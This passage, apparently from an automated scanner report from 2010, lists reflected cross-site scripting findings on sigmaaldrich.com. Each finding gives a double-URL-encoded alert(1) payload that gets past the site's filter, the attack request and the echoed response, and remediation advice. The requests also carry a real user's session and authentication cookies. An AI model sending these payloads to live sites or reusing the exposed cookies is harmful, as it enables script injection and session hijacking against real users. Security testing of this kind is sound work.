bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/20420";alert(1)//86b2e897c21","E404") ;
   </script>
...[SNIP]...

1.539. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/epigenetics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95c80%2522%253balert%25281%2529%252f%252f04bf9b97a75 was submitted in the REST URL parameter 1. This input was echoed as 95c80";alert(1)//04bf9b97a75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science95c80%2522%253balert%25281%2529%252f%252f04bf9b97a75/epigenetics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science95c80";alert(1)//04bf9b97a75/epigenetics.html","E404") ;
   </script>
...[SNIP]...

1.540. http://www.sigmaaldrich.com/life-science/epigenetics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/epigenetics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74122%2522%253balert%25281%2529%252f%252f71dbe4fc838 was submitted in the REST URL parameter 2. This input was echoed as 74122";alert(1)//71dbe4fc838 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/74122%2522%253balert%25281%2529%252f%252f71dbe4fc838 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/74122";alert(1)//71dbe4fc838","E404") ;
   </script>
...[SNIP]...

1.541. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b91c%2522%253balert%25281%2529%252f%252f13508bb2221 was submitted in the REST URL parameter 1. This input was echoed as 4b91c";alert(1)//13508bb2221 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science4b91c%2522%253balert%25281%2529%252f%252f13508bb2221/functional-genomics-and-rnai.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science4b91c";alert(1)//13508bb2221/functional-genomics-and-rnai.html","E404") ;
   </script>
...[SNIP]...

1.542. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64d76%2522%253balert%25281%2529%252f%252fafeb1d1e910 was submitted in the REST URL parameter 2. This input was echoed as 64d76";alert(1)//afeb1d1e910 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/64d76%2522%253balert%25281%2529%252f%252fafeb1d1e910 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:32 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/64d76";alert(1)//afeb1d1e910","E404") ;
   </script>
...[SNIP]...

1.543. http://www.sigmaaldrich.com/life-science/functional-genomics-and-rnai/shrna-library-details.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/functional-genomics-and-rnai/shrna-library-details.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1223%2522%253balert%25281%2529%252f%252f822b16cc94e was submitted in the REST URL parameter 1. This input was echoed as c1223";alert(1)//822b16cc94e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencec1223%2522%253balert%25281%2529%252f%252f822b16cc94e/functional-genomics-and-rnai/shrna-library-details.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


